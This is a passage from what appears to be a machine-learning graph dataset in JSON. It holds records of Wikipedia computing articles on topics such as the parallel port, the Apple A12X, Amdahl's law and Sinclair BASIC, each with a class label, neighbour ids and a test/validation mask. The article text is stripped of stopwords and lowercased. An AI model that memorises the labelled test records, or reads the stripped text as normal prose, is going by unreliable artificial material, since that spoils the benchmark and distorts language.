    "text": "Intel_Inspector:intel inspector intel inspector successor intel thread checker memory thread checking debugging tool increase reliability security accuracy c/c++ fortran applications memory checking includes memory leaks dangling pointers uninitialized variables use invalid memory references mismatched memory allocation deallocation stack memory checks stack trace controllable stack trace depth thread checking includes race conditions deadlocks depth configurable call stack analysis diagnostic guidance built-in knowledge threading building blocks tbb openmp posix win32 threads available part intel parallel studio limitations",
    "neighbors": [
      1954,
      6184,
      814,
      7983,
      8531,
      7097,
      3162,
      1916,
      2045,
      3962
    ],
    "mask": "Test"
  },
  {
    "node_id": 780,
    "label": 5,
    "text": "Parallel_port:parallel port parallel port type interface found computers personal otherwise connecting peripherals name refers way data sent parallel ports send multiple bits data parallel communication opposed serial interfaces send bits one time parallel ports require multiple data lines cables port connectors tend larger contemporary serial ports require one data line many types parallel ports term become closely associated printer port centronics port found personal computers 1970s 2000s industry de facto standard many years finally standardized ieee 1284 late 1990s defined enhanced parallel port epp extended capability port ecp bi-directional versions today parallel port interface virtually non-existent rise universal serial bus usb devices along network printing using ethernet wi-fi connected printers parallel port interface originally known parallel printer adapter ibm pc-compatible computers primarily designed operate printers used ibm eight-bit extended ascii character set print text could also used adapt peripherals graphical printers along host devices designed communicate system wang robert howard prentice robinson began development low-cost printer centronics subsidiary wang laboratories produced specialty computer terminals printer used dot matrix printing principle print head consisting vertical row seven metal pins connected solenoids power applied solenoids pin pulled forward strike paper leave dot make complete character glyph print head would receive power specified pins create single vertical pattern print head would move right small amount process repeated original design typical glyph printed matrix seven high five wide models used print head 9 pins formed glyphs 9 7 left problem sending ascii data printer serial port minimum pins wires requires device buffer data arrives bit bit turn back multi-bit values parallel port makes simpler entire ascii value presented pins complete form addition seven data pins system also needed various control pins well electrical grounds wang happened surplus stock 20,000 amphenol 36-pin micro ribbon connectors originally used one early calculators interface required 21 pins rest grounded connected connector become closely associated centronics popularly known centronics connector centronics model 101 printer featuring connector released 1970 host sent ascii characters printer using seven eight data pins pulling high +5v represent 1 data ready host pulled strobe pin low 0 v. printer responded pulling busy line high printing character returning busy low host could send another character control characters data caused actions like codice_1 codice_2 host could also printer automatically start new line pulling autofeed line high keeping host carefully watch busy line ensure feed data printer rapidly especially given variable-time operations like paper feed printer side interface quickly became industry de facto standard manufacturers used various connectors system side variety cables required example ncr used 36-pin micro ribbon connector ends connection early vax systems used dc-37 connector texas instruments used 25-pin card edge connector data general used 50-pin micro ribbon connector ibm implemented parallel interface ibm pc used db-25f connector pc-end interface creating familiar parallel cable db25m one end 36-pin micro ribbon connector theory centronics port could transfer data rapidly 75,000 characters per second far faster printer averaged 160 characters per second meaning port spent much time idle performance defined rapidly host could respond printer busy signal asking data improve performance printers began incorporating buffers host could send data rapidly bursts reduced eliminated delays due latency waiting next character arrive host also freed host perform operations without causing loss performance performance improved using buffer store several lines printing directions eliminating delay print head returned left side page changes doubled performance otherwise unchanged printer case centronics models like 102 308 ibm released ibm personal computer 1981 included variant centronics interface— ibm logo printers rebranded epson could used ibm pc ibm standardized parallel cable db25f connector pc side 36-pin centronics connector printer side vendors soon released printers compatible standard centronics ibm implementation original ibm parallel printer adapter ibm pc designed support 8-bit data bidirectionally 1981 allowed port used purposes output printer accomplished allowing data lines written devices either end cable required ports host bidirectional feature saw little use removed later revisions hardware years later 1987 ibm reintroduced bidirectional interface ibm ps/2 series could enabled disabled compatibility applications hardwired expect printer port bidirectional printer market expanded new types printing mechanisms appeared often supported new features error conditions could represented existing port relatively status pins ibm solution could support trivial implement time supported led bi-tronics system introduced hp laserjet 4 1992 used four existing status pins error select pe busy represent nibble using two transfers send 8-bit value bi-tronics mode known nibble mode indicated host pulling select line high data transferred host toggles autofeed low changes handshaking protocols improved performance reaching 400,000 cps printer 50,000 cps back host major advantage bi-tronics system driven entirely software host uses otherwise unmodified hardware pins used data transfer back host already printer-to-host lines introduction new devices like scanners multi-function printers demanded much performance either bi-tronics ibm style backchannels could handle two standards become popular purposes enhanced parallel port epp originally defined zenith electronics similar ibm byte mode concept changes details handshaking allow 2 mbyte/s extended capability port ecp essentially entirely new port physical housing also adds direct memory access based isa run-length encoding compress data especially useful transferring simple images like faxes black-and-white scanned images ecp offers performance 2.5 mbyte/s directions enhancements collected part ieee 1284 standard first release 1994 included original centronics mode compatibility mode nibble byte modes well change handshaking already widely used original centronics implementation called busy lead toggle change line data busy-by-line whereas ieee 1284 calls busy toggle received character busy-by-character reduces number busy toggles resulting interruptions sides 1997 update standardized printer status codes 2000 epp ecp modes moved standard well several connector cable styles method daisy chaining eight devices single port host systems print servers may use strobe signal relatively low voltage output fast toggle issues might cause intermittent printing missing repeated characters garbage printing printer models may switch setting set busy character others may require handshake adapter dataproducts introduced different implementation parallel interface printers used dc-37 connector host side 50 pin connector printer side—either dd-50 sometimes incorrectly referred db50 block shaped m-50 connector m-50 also referred winchester dataproducts parallel available short-line connections long-line version using differential signaling connections dataproducts interface found many mainframe systems 1990s many printer manufacturers offered dataproducts interface option wide variety devices eventually designed operate parallel port devices uni-directional one-way devices meant respond information sent pc however devices zip drives able operate bi-directional mode printers also eventually took bi-directional system allowing various status report information sent advent usb parallel interface adapted access number peripheral devices printers one early use parallel port dongles used hardware keys supplied application software form software copy protection uses included optical disc drives cd readers writers zip drives scanners external modems gamepads joysticks earliest portable mp3 players required parallel port connection transferring songs device adapters available run scsi devices via parallel devices eprom programmers hardware controllers could connected via parallel port pc-compatible systems 1980s 1990s one three ports communication interfaces defined like printer port present 0x3bc second port row 0x378 becomes logical parallel port 1 0x278 becomes logical parallel port 2 bios sometimes printer ports jumpered share interrupt despite io addresses i.e one used interrupt-driven time cases bios supports fourth printer port well base address differs significantly vendors since reserved entry fourth logical printer port bios data area bda shared uses ps/2 machines s3 compatible graphics cards typically requires special drivers environments dr-dos 7.02 bios port assignments changed overridden using lpt1 lpt2 lpt3 optionally lpt4 config.sys directives dos-based systems make logical parallel ports detected bios available device names lpt1 lpt2 lpt3 corresponding logical parallel port 1 2 3 respectively names derive terms like line print terminal local print terminal line printer similar naming convention used dec systems well cp/m 86-dos lst dos parallel printers could accessed directly command line example command type c \\autoexec.bat lpt1 would redirect contents autoexec.bat file printer port prn device also available alias lpt1 operating systems like multiuser dos allow change fixed assignment different means dos versions use resident driver extensions provided mode users change mapping internally via config.sys prn=n directive dr-dos 7.02 higher dr-dos 7.02 also provides optional built-in support lpt4 underlying bios supports prn along con aux others invalid file directory names dos windows even windows xp even ms-dos device path name vulnerability windows 95 98 causes computer crash user types c \\con\\con c \\prn\\prn c \\aux\\aux windows explorer address bar microsoft released patch fix bug newly installed windows 95 98 operating systems still bug special print command also existed achieve effect microsoft windows still refers ports manner many cases though often fairly hidden sco unix linux first parallel port available via filesystem /dev/lp0 linux ide devices use paride parallel port ide driver consumers usb computer networks replaced parallel printer port connections printers devices many manufacturers personal computers laptops consider parallel legacy port longer include parallel interface smaller machines less room large parallel port connectors usb-to-parallel adapters available make parallel-only printers work usb-only systems pci pci-express cards provide parallel ports also print servers provide interface parallel port network usb-to-epp chips also allow non-printer devices continue work modern computers without parallel port electronics hobbyists parallel port still often easiest way connect external circuit board faster common legacy port serial port requires serial-to-parallel converter requires far less interface logic software usb target interface however microsoft operating systems later windows 95/98 prevent user programs directly writing reading lpt without additional software kernel extensions current cnc milling machines also often make use parallel port directly control machine motors attachments traditionally ibm pc systems allocated first three parallel ports according configuration table three printer ports exist unused slot port addresses others moved example port 0x3bc exist port 0x378 become first logical parallel port base address 0x3bc typically supported printer ports mda hercules display adapters whereas printer ports provided mainboard chipset add-on cards rarely allow configured base address therefore absence monochrome display adapter common assignment first logical parallel port therefore also corresponding lpt1 dos device driver today 0x378 even though default still 0x3bc would selected bios detects printer port address irq lines typically configurable hardware well assigning interrupt one printer port avoided typically cause one corresponding ports work polled mode port addresses assigned slot determined reading bios data area bda 0000h:0408h bit-to-pin mapping standard parallel port spp indicates hardware inversion bit versions windows use windows nt kernel well dos operating systems programs could access parallel port simple outportb inportb subroutine commands operating systems windows nt unix netbsd freebsd solaris 386bsd etc microprocessor operated different security ring access parallel port prohibited unless using required driver improves security arbitration device contention linux inb outb used process run root ioperm command used allow access base address alternatively ppdev allows shared access used userspace appropriate permissions set cross-platform library parallel port access libieee1284 also available many linux distributions provides abstract interface parallel ports system access handled open-claim-release-close sequence allows concurrent access userspace older parallel printer ports 8-bit data bus four pins control output strobe linefeed initialize select five control input ack busy select error paper data transfer speed 150 kbit/s newer epps enhanced parallel ports 8-bit data bus control pins normal parallel printer port newer ports reach speeds 2 mb/s pinouts parallel port connectors inverted lines true logic low inverted logic high true pin 25 db25 connector might connected ground modern computers hardware ic chips",
    "neighbors": [
      3457,
      7041,
      5384,
      9992,
      11657,
      1147,
      780,
      6797,
      10635,
      8976,
      8850,
      4244,
      533,
      405,
      7188,
      7445,
      2201,
      6556,
      9633,
      1186,
      548,
      1958,
      7591,
      1194,
      7215,
      9907,
      1463,
      2871,
      823,
      3514,
      4409,
      4796,
      8898,
      6854,
      3272,
      7626,
      6859,
      2383,
      5711,
      5457,
      4306,
      5968,
      8659,
      8786,
      11604,
      8920,
      9947,
      10972,
      1121,
      9057,
      10337,
      3943,
      5736,
      3945,
      8301,
      6510,
      2159,
      1776,
      4465,
      6129,
      7151,
      5492,
      5368,
      633,
      3323,
      5629
    ],
    "mask": "None"
  },
  {
    "node_id": 781,
    "label": 3,
    "text": "Apple_A12X:apple a12x apple a12x bionic 64-bit system chip soc designed apple inc first appeared 11-inch ipad pro third-generation 12.9-inch ipad pro announced october 30 2018 a12x variant a12 apple claims 35 percent faster single-core cpu performance 90 percent faster multi-core cpu performance predecessor a10x a12x features apple-designed 64-bit armv8-a octa-core cpu four high-performance cores called vortex four energy-efficient cores called tempest vortex cores 7-wide decode out-of-order superscalar design tempest cores 3-wide decode out-of-order superscalar design like mistral cores tempest cores based apple swift cores apple a6 similar performance arm cortex-a73 cpu cores apple ’ first soc octa core cpu a12x integrates apple-designed septa core graphics processing unit gpu twice graphics performance a10x embedded a12x m12 motion coprocessor a12x includes dedicated neural network hardware apple calls next-generation neural engine neural network hardware found a12 perform 5 trillion operations per second a12x manufactured tsmc using 7 nm finfet process contains 10 billion transistors vs. 6.9 billion a12 a12x paired 4 gb lpddr4x memory third-generation 12.9 ipad pro 11 ipad pro 6 gb 1tb storage configurations",
    "neighbors": [
      9732,
      7697,
      4114,
      9235,
      11282,
      6165,
      11289,
      7706,
      8222,
      1057,
      2551,
      38,
      6183,
      1576,
      4139,
      7211,
      8237,
      9774,
      2097,
      8250,
      8253,
      7745,
      1090,
      7747,
      2635,
      8783,
      4180,
      10838,
      10840,
      9312,
      9826,
      99,
      8806,
      8812,
      6258,
      10357,
      10361,
      4220,
      10365,
      638,
      6783,
      10878,
      644,
      4741,
      8842,
      6283,
      7824,
      146,
      147,
      659,
      7830,
      6807,
      7833,
      666,
      5786,
      6815,
      4258,
      7842,
      7844,
      4773,
      2735,
      9913,
      4283,
      7869,
      8893,
      8383,
      8896,
      10945,
      4807,
      4810,
      1744,
      4821,
      3293,
      9952,
      2788,
      3301,
      6884,
      1772,
      9964,
      1776,
      10481,
      6391,
      3835,
      2814,
      1290,
      3338,
      6926,
      4879,
      784,
      8480,
      10023,
      5417,
      2862,
      4399,
      4910,
      7988,
      11062,
      11066,
      6971,
      9022,
      1346,
      8003,
      10562,
      6981,
      5963,
      8525,
      1871,
      1872,
      9042,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      1377,
      11629,
      10608,
      6001,
      373,
      8058,
      9084,
      7549,
      11649,
      392,
      3977,
      6539,
      398,
      1428,
      3483,
      4508,
      10658,
      2979,
      5028,
      7077,
      9638,
      8109,
      3511,
      2492,
      446,
      7614,
      5058,
      9155,
      10691,
      2502,
      456,
      1482,
      9163,
      7631,
      464,
      6608,
      980,
      9685,
      8662,
      9174,
      10199,
      8665,
      2524,
      9182,
      2023,
      10734,
      5616,
      6130,
      1014,
      3575,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 782,
    "label": 8,
    "text": "Secure_Islands:secure islands secure islands technologies ltd. israeli privately held technology company headquartered 5 menachem begin ave. beit dagan subsequently acquired microsoft company develops markets information protection control ipc solutions secure islands technologies ltd. founded two brothers aki yuval eldar late 2006 develop sell advanced data security solutions jerusalem-based start-up company suggested new solution data protection embedding security directly data secure islands builds software designed classify sensitive information automatically based policies outlined enterprise wrap appropriate level digital rights management drm microsoft acquired israeli cyber-sec startup secure islands 2015 secure islands technologies ltd. software based active data immunization concept secure islands ’ data immunization technology uniquely embeds protection within information moment creation initial organizational access process automatic accompanies sensitive information throughout lifecycle creation usage collaboration storage archival company iqprotector product cloud-based classifies unstructured data automates irm classification endpoints",
    "neighbors": [
      2818,
      259,
      4356,
      10245,
      6150,
      11524,
      6797,
      1935,
      10900,
      3605,
      11030,
      3224,
      11549,
      7838,
      7456,
      929,
      5666,
      3875,
      7970,
      11559,
      1832,
      6441,
      6827,
      7215,
      3890,
      11060,
      8757,
      7359,
      4289,
      194,
      3527,
      9033,
      6476,
      10957,
      4816,
      4051,
      9812,
      11221,
      11605,
      4439,
      1498,
      11103,
      4704,
      10338,
      740,
      2919,
      9448,
      617,
      8681,
      9585,
      7796,
      6265,
      1916
    ],
    "mask": "None"
  },
  {
    "node_id": 783,
    "label": 3,
    "text": "R2000_(microprocessor):r2000 microprocessor r2000 32-bit microprocessor chip set developed mips computer systems implemented mips instruction set architecture isa introduced january 1986 first commercial implementation mips architecture first commercial risc processor available companies r2000 competed digital equipment corporation dec vax minicomputers motorola 68000 intel corporation 80386 microprocessors r2000 users included ardent computer dec silicon graphics northern telecom mips unix workstations chip set consisted r2000 microprocessor r2010 floating-point accelerator four r2020 write buffer chips core r2000 chip executed non-floating-point instructions simple short pipeline chip also controlled external code data caches made fast standard sram chips organized direct indexing one-cycle read latency r2000 chip contained small translation lookaside buffer mapping virtual memory addresses r2010 chip held floating point registers floating point data paths longer simple pipeline writes main memory dram took tens cycles fully complete r2020 chips queued completed 4 pending writes main memory allowing r2000 core proceed without stalling absence cache misses chip set sustained instruction completion rate one instruction per alu cycle much faster non-risc microprocessors time needed several cycles per instruction 1986 also saw similar technology sun first sparc microprocessor hewlett packard first pa-risc microprocessor overall speed limited cache size cache cycle time r2000 chip set sram initially sold complete circuit board ensure good cache bus timings 1987 system builders began using chip set arbitrary new board designs r2000 available 8.3 12.5 15 mhz grades die contained 110,000 transistors measured 80 mm 2.0 μm double-metal cmos process mips fabless semiconductor company capability fabricate integrated circuits chip set initially fabricated mips sierra semiconductor toshiba december 1987 mips licensed integrated device technology lsi logic performance semiconductor also fabricate market r2000 sierra toshiba continued serve foundries lsi fabricated chip set 2.0 μm double-metal cmos process marketed lr2000 performance semiconductor fabricated chip set pace-i 0.8 μm double-metal cmos process marketed pr2000 1988 improved version introduced r2000a composed r2000a r2010a ics operated 12.5 16.67 mhz used extensively embedded applications printer controllers 1988 r2000 followed r3000 using similar overall system design faster chip implementation",
    "neighbors": [
      4098,
      8327,
      8711,
      3597,
      7954,
      7445,
      9851,
      4124,
      8481,
      5028,
      8231,
      6057,
      938,
      426,
      9003,
      8237,
      9391,
      7234,
      10051,
      3142,
      1480,
      10316,
      11604,
      6247,
      6250,
      2155,
      6252,
      6253,
      5358,
      6256,
      5873,
      8944,
      5237,
      1399,
      760,
      3451
    ],
    "mask": "Validation"
  },
  {
    "node_id": 784,
    "label": 2,
    "text": "IPad_Mini_(1st_generation):ipad mini 1st generation first-generation ipad mini stylized marketed ipad mini mini tablet computer designed developed marketed apple inc announced october 23 2012 fourth major product ipad line first ipad mini line features reduced screen size contrast standard features similar internal specifications ipad 2 including display resolution first generation ipad mini received positive reviews reviewers praising device size design availability applications criticizing use proprietary power connector lack expandable storage lack retina display october 16 2012 apple announced media event scheduled october 23 california theatre san jose california company predisclose subject event widely expected ipad mini day event apple ceo tim cook introduced new version macbook family new generations macbook pro mac mini imac ipad mini higher end fourth-generation ipad released november 2 2012 nearly apple markets 32 gb 64 gb models discontinued release successor ipad mini 2 october 22 2013 almost 3 years june 19 2015 remaining 16 gb model discontinued well well discontinued stores ipad mini longer receives software updates supported apple ipad mini shipped ios 6.0 act hotspot carriers sharing internet connection wi-fi bluetooth usb also access app store digital application distribution platform ios developed maintained apple service allows users browse download applications itunes store developed xcode ios sdk published apple app store garageband imovie iphoto iwork apps pages keynote numbers available latest version currently ios 9.3.6 ipad mini comes several pre-installed applications including siri safari mail photos video music itunes app store maps notes calendar game center photo booth contacts like ios devices ipad sync content data mac pc using itunes although ios 5 later managed backed icloud although tablet designed make telephone calls cellular network users use headset built-in speaker microphone place phone calls wi-fi cellular using voip application skype device dictation using voice recognition technology iphone 4s user speaks ipad types say screen provided ipad connected wi-fi cellular network device optional ibooks application displays books epub-format content downloaded ibookstore several major book publishers including penguin books harpercollins simon schuster macmillan committed publishing books device despite direct competitor amazon kindle barnes noble nook amazon.com barnes noble offer e-reader apps ipad september 17 2014 ios 8 released first generation ipad mini apple devices however newer features software supported due relatively aged hardware shared ipad 2 september 16 2015 ipad mini received ios 9 update n't new multitasking features featured ipads june 13 2016 apple announced ios 10 update major updates mobile operating system however ipad mini receive update along devices using a5 processor including iphone 4s ipad 2 ipad 3rd generation ipod touch 5th generation due hardware limitations apple stopping latest ios updates ipad mini expected many industry however led criticism device sale june 2015 june 2016 versions operating system beyond ios 9 made available tablet four buttons one switch ipad mini including home button near display returns user home screen three aluminum buttons right side top wake/sleep volume volume plus software-controlled switch whose function varies software updates tablet manufactured either without capability communicate cellular network models connect wireless lan via wi-fi ipad mini available 16 32 64 gb internal flash memory expansion option apple sells camera connection kit sd card reader used transfer photos videos ipad mini features partially hardware ipad 2 screens resolutions 1024 x 768 ipad mini smaller screen thus higher pixel density ipad 2 163 ppi vs 132 ppi unlike ipad 2 5 mp 1.2 mp cameras lightning connector system-on-chip a5 one found later revision ipad 2 32 nm audio processor found iphone 5 ipad 4th generation allows ipad mini siri voice dictation unlike ipad 2 graphics processor gpu ipad mini one found ipad 2 powervr sgx543mp2 ipad mini initially featured slate silver colors however release mini 2 slate color changed space gray silver color remained smart cover introduced ipad 2 screen protector magnetically attaches face ipad smaller version available ipad mini 1 later models including ipad mini 4 also use smart cover cover three folds allow convert stand held together magnets smart covers microfiber bottom cleans front ipad wakes unit cover removed comes six colors polyurethane apple offers accessories including bluetooth keyboard several types earbuds headphones many adapters lightning connector applecare free engraving also available ipad mini reviews first generation ipad mini positive reviewers praising device size design availability applications criticizing use proprietary power connector lack expandable storage retina display device competes tablets amazon kindle fire hd google nexus 7 barnes noble nook hd joshua topolsky verge praised industrial design ipad mini however panned lack retina display price",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      6186,
      4139,
      6700,
      7211,
      1074,
      8754,
      9784,
      8253,
      576,
      1090,
      8783,
      4180,
      10838,
      1623,
      3672,
      10840,
      9312,
      3681,
      9826,
      8806,
      3691,
      2673,
      6258,
      10357,
      6264,
      4220,
      7292,
      2686,
      6783,
      7806,
      10365,
      10878,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      7844,
      11430,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      8893,
      8896,
      6654,
      4807,
      4810,
      3790,
      1744,
      3286,
      9430,
      3293,
      4318,
      9952,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      10478,
      1776,
      10481,
      7420,
      1290,
      3338,
      781,
      4879,
      9999,
      10512,
      4888,
      5912,
      8480,
      10023,
      4910,
      4399,
      7983,
      7991,
      11066,
      2363,
      2365,
      2366,
      9022,
      11257,
      1346,
      10562,
      838,
      7496,
      8525,
      2388,
      8534,
      3928,
      8540,
      4957,
      6495,
      8544,
      9063,
      10602,
      3948,
      11629,
      10608,
      9084,
      7549,
      11649,
      2439,
      6023,
      3977,
      6539,
      7052,
      1428,
      3483,
      10658,
      2979,
      9123,
      11173,
      8109,
      2492,
      446,
      7614,
      5058,
      10691,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      8665,
      7133,
      9182,
      4068,
      5093,
      487,
      488,
      2023,
      8170,
      5616,
      6130,
      7154,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 785,
    "label": 3,
    "text": "Amdahl's_law:amdahl law computer architecture amdahl law amdahl argument formula gives theoretical speedup latency execution task fixed workload expected system whose resources improved named computer scientist gene amdahl presented afips spring joint computer conference 1967 amdahl law often used parallel computing predict theoretical speedup using multiple processors example program needs 20 hours using single processor core particular part program takes one hour execute parallelized remaining 19 hours execution time parallelized regardless many processors devoted parallelized execution program minimum execution time less critical one hour hence theoretical speedup limited 20 times formula_1 reason parallel computing many processors useful highly parallelizable programs amdahl law formulated following way furthermore shows theoretical speedup execution whole task increases improvement resources system regardless magnitude improvement theoretical speedup always limited part task benefit improvement amdahl law applies cases problem size fixed practice computing resources become available tend get used larger problems larger datasets time spent parallelizable part often grows much faster inherently serial work case gustafson law gives less pessimistic realistic assessment parallel performance task executed system whose resources improved compared initial similar system split two parts example computer program processes files disk part program may scan directory disk create list files internally memory another part program passes file separate thread processing part scans directory creates file list sped parallel computer part processes files execution time whole task improvement resources system denoted formula_4 includes execution time part would benefit improvement resources execution time one would benefit fraction execution time task would benefit improvement resources denoted formula_5 one concerning part would benefit therefore execution part benefits improvement resources accelerated factor formula_7 improvement resources consequently execution time part benefit remains part benefits becomes theoretical execution time formula_9 whole task improvement resources amdahl law gives theoretical speedup latency execution whole task fixed workload formula_11 yields 30 execution time may subject speedup p 0.3 improvement makes affected part twice fast 2 amdahl law states overall speedup applying improvement example assume given serial task split four consecutive parts whose percentages execution time respectively told 1st part sped 2nd part sped 5 times 3rd part sped 20 times 4th part sped 1.6 times using amdahl law overall speedup notice 5 times 20 times speedup 2nd 3rd parts respectively n't much effect overall speedup 4th part 48 execution time accelerated 1.6 times example serial program two parts b therefore making part run 2 times faster better making part b run 5 times faster percentage improvement speed calculated non-parallelizable part optimized factor follows amdahl law speedup due parallelism given formula_20 formula_21 meaning speedup measured respect execution time non-parallelizable part optimized formula_22 formula_24 formula_25 formula_26 next consider case wherein non-parallelizable part reduced factor parallelizable part correspondingly increased follows amdahl law speedup due parallelism given derivation agreement jakob jenkov analysis execution time vs. speedup tradeoff amdahl law often conflated law diminishing returns whereas special case applying amdahl law demonstrates law diminishing returns one picks optimally terms achieved speedup improve one see monotonically decreasing improvements one improves however one picks non-optimally improving sub-optimal component moving improve optimal component one see increase return note often rational improve system order non-optimal sense given improvements difficult require larger development time others amdahl law represent law diminishing returns considering sort return one gets adding processors machine one running fixed-size computation use available processors capacity new processor added system add less usable power previous one time one doubles number processors speedup ratio diminish total throughput heads toward limit 1/ 1 − p analysis neglects potential bottlenecks memory bandwidth i/o bandwidth resources scale number processors merely adding processors provides even lower returns implication amdahl law speedup real applications serial parallel portions heterogeneous computing techniques required example cpu-gpu heterogeneous processor may provide higher performance energy efficiency cpu-only gpu-only processor",
    "neighbors": [
      6656,
      6801,
      7313,
      7699,
      153,
      7963,
      6815,
      2210,
      8229,
      5798,
      9126,
      6184,
      2345,
      5802,
      4909,
      8367,
      6268,
      7218,
      10675,
      8501,
      5948,
      4286,
      2623,
      2113,
      8514,
      5956,
      4423,
      1480,
      6909,
      330,
      1866,
      7497,
      8523,
      78,
      9932,
      4308,
      2008,
      344,
      2394,
      731,
      2140,
      2396,
      2264,
      7006,
      11487,
      2273,
      4194,
      5090,
      11618,
      7142,
      5223,
      2536,
      8810,
      4205,
      1778,
      6774,
      7802,
      508,
      3197,
      8447
    ],
    "mask": "Test"
  },
  {
    "node_id": 786,
    "label": 9,
    "text": "Sinclair_BASIC:sinclair basic sinclair basic dialect programming language basic used 8-bit home computers sinclair research timex sinclair sinclair basic interpreter made nine tiles networks ltd. sinclair basic originally developed 1979 zx80 nine tiles programmers john grant owner nine tiles steve vickers initially incomplete implementation 1978 american national standards institute ansi minimal basic standard integer arithmetic termed 4k basic rom size zx80 evolved floating-point 8k basic zx81 ts1000 also available upgrade zx80 became almost complete version 16 kb rom zx spectrum present zx spectrum compatibles 2015 interpreters exist modern operating systems older systems allow sinclair basic used easily new basic programmers might start simple program perhaps using language print statement display message screen well-known often-replicated example kernighan ritchie hello world program 16k/48k zx spectrum 88 keywords sinclair basic denoting commands 50 functions logical operators 31 keywords 16 including 9 also commands functions keywords entered via sinclair unique keyword entry system indicated table common commands need one keystroke example pressing start line spectrum produces full command codice_1 less frequent commands require complex key sequences codice_2 example keyed pressing plus access extended mode later models include key keeping held pressing keywords colour-coded original spectrum keyboard indicate mode required zx81 8k basic used shorter forms codice_3 codice_4 codice_5 codice_6 whereas spectrum used longer forms codice_7 codice_8 codice_9 codice_10 zx80 4k basic also used longer forms differed using spelling codice_11 zx81 8k basic version use codice_12 codice_13 codice_14 codice_15 zx80 4k basic exclusive function codice_16 equivalent string operator later versions unique code points assigned zx80 character set zx81 character set zx spectrum character set keyword multi-character operator i.e codice_17 codice_18 codice_19 codice_20 tokenized zx81 codice_21 replaced codice_22 spectrum expanded referencing token table rom thus keyword uses one byte memory significant saving traditional letter-by-letter storage also meant basic interpreter could quickly determine command function evaluating one byte keywords need reserved words like basic dialects programming languages e.g. allowed define variable named codice_1 output value codice_24 also related syntax requirement every line start command keyword pressing one keypress command start line changes editor command mode letter mode thus variable assignment requires let i.e. let a=1 a=1 practice also different basic dialects meant unlike basic dialects interpreter needed parentheses identify functions codice_25 sufficient codice_26 needed though latter allowed 4k basic rom zx80 short list exceptions functions codice_27 codice_28 codice_16 codice_30 codice_31 codice_32 codice_33 codice_34 one-byte tokens typed letter-by-letter required parentheses listed integral functions label right keyboard 128k spectrum models zx spectrum 128 +2 +3 +2a +2b also stored keywords internally one-byte code points used conventional letter-by-letter basic input system also introduced two new commands original spanish zx spectrum 128 included four additional commands spanish one undocumented translated unlike codice_41 codice_42 codice_43 functions used ubiquitous microsoft basic dialects home computers parts strings sinclair basic accessed numeric range example gives substring starting 5th ending 10th character variable codice_44 thus possible replace codice_41 codice_43 commands simply omitting left right array position respectively example equivalent codice_47 codice_48 alone enough replace codice_49 string array variable names must consist one alphabetical character thus let a=5 let apples=5 let hello dim 10 dim 10 good let apples fruit dim apples 10 dim apples 10 long variable names allowed numeric variables include alphanumeric characters first character let a0=5 allowed let 0a=5 long variable names also include spaces ignored let number apples 5 let numberofapples 5 several zx spectrum interpreters exist several zx spectrum compilers exist",
    "neighbors": [
      9345,
      3718,
      7691,
      1805,
      9997,
      11412,
      22,
      3736,
      3481,
      9881,
      797,
      3233,
      11683,
      5925,
      8101,
      4136,
      10666,
      8494,
      303,
      7343,
      9006,
      11315,
      823,
      9911,
      1849,
      6074,
      315,
      7355,
      7486,
      7870,
      4160,
      4674,
      10750,
      712,
      10571,
      3788,
      847,
      2383,
      1879,
      92,
      11229,
      2915,
      9188,
      5733,
      11243,
      2541,
      8429,
      9714,
      5747,
      5492,
      759,
      6778,
      7421,
      6910,
      1535
    ],
    "mask": "None"
  },
  {
    "node_id": 787,
    "label": 2,
    "text": "UNETix:unetix unetix early implementation unix ibm pc systems true unix written scratch pc without using code system v. unetix supported single user however maintained closer compatibility standard versions unix early versions qnx unetix multiple windows capability possibly first implementation windowing unix-like operating system 10 windows supported could run independent tasks could individual foreground background colors set special codice_1 command published lantech systems inc unetix list price 1984 130 usd discounted advertised 99 usd usd today minimum ram requirement 256 kb machine would able support single-tasking multitasking required 512 kb emulation environment ms-dos could run dos 1.1 programs one window unix programs ran windows major weaknesses slow speed lack hard disk support unetix came full assembly language programming environment c compiler optional lantech claimed c compiler first available x86 architecture",
    "neighbors": [
      6675,
      7187,
      10776,
      25,
      4637,
      9762,
      5158,
      7217,
      9784,
      10809,
      576,
      10333,
      97,
      8298,
      7285,
      9335,
      2168,
      633,
      1147,
      3197,
      1150,
      2179,
      6787,
      10883,
      6797,
      9366,
      6296,
      7325,
      9887,
      3241,
      3248,
      6837,
      8388,
      10436,
      9932,
      5840,
      7382,
      8410,
      6369,
      1253,
      6378,
      5363,
      2811,
      10499,
      1804,
      6412,
      273,
      11539,
      5397,
      1304,
      10016,
      2345,
      7983,
      823,
      4409,
      7483,
      11075,
      4423,
      5457,
      11601,
      10590,
      8551,
      5492,
      2424,
      394,
      3978,
      7057,
      11667,
      8092,
      3487,
      421,
      11184,
      2995,
      9141,
      6075,
      6078,
      9151,
      8136,
      9166,
      477,
      6128,
      499,
      5619,
      10235
    ],
    "mask": "Test"
  },
  {
    "node_id": 788,
    "label": 2,
    "text": "Ports_collection:ports collection ports collections ports trees ports sets makefiles patches provided bsd-based operating systems freebsd netbsd openbsd simple method installing software creating binary packages usually base package management system ports handling package creation additional tools managing package removal upgrade tasks addition bsds linux distributions implemented similar infrastructure including gentoo portage arch arch build system abs crux ports void linux templates main advantage ports collection method install fine tuning optimization software installation according hardware resources available instance system administrator easily create 64-bit install piece software 64-bit system 64-bit binary n't readily available instead using 32-bit version optimized system hand main disadvantage extra time spent packages compilation instance full install freebsd system ports collection take several days depending system performance jordan hubbard committed port make macros freebsd cvs repository august 21 1994 package install suite makefile committed year earlier august 26 1993 core ports framework first maintained hubbard along satoshi asami several years ports management team later formed handle task netbsd pkgsrc ports collection distinctive aims portable usable number operating systems aside netbsd including bsds smartos/illumos macos minix 3 linux unix-likes pkgsrc created august 1997 based existing freebsd ports system follows quarterly release schedule october 2018 contains 22'000 packages 1.4 release dragonfly bsd announced would adopting pkgsrc official package management system dragonfly bsd however built ports implementation called dports release 3.4 switched completely 3.6 development done via git contrast freebsd ports originally based openbsd ports 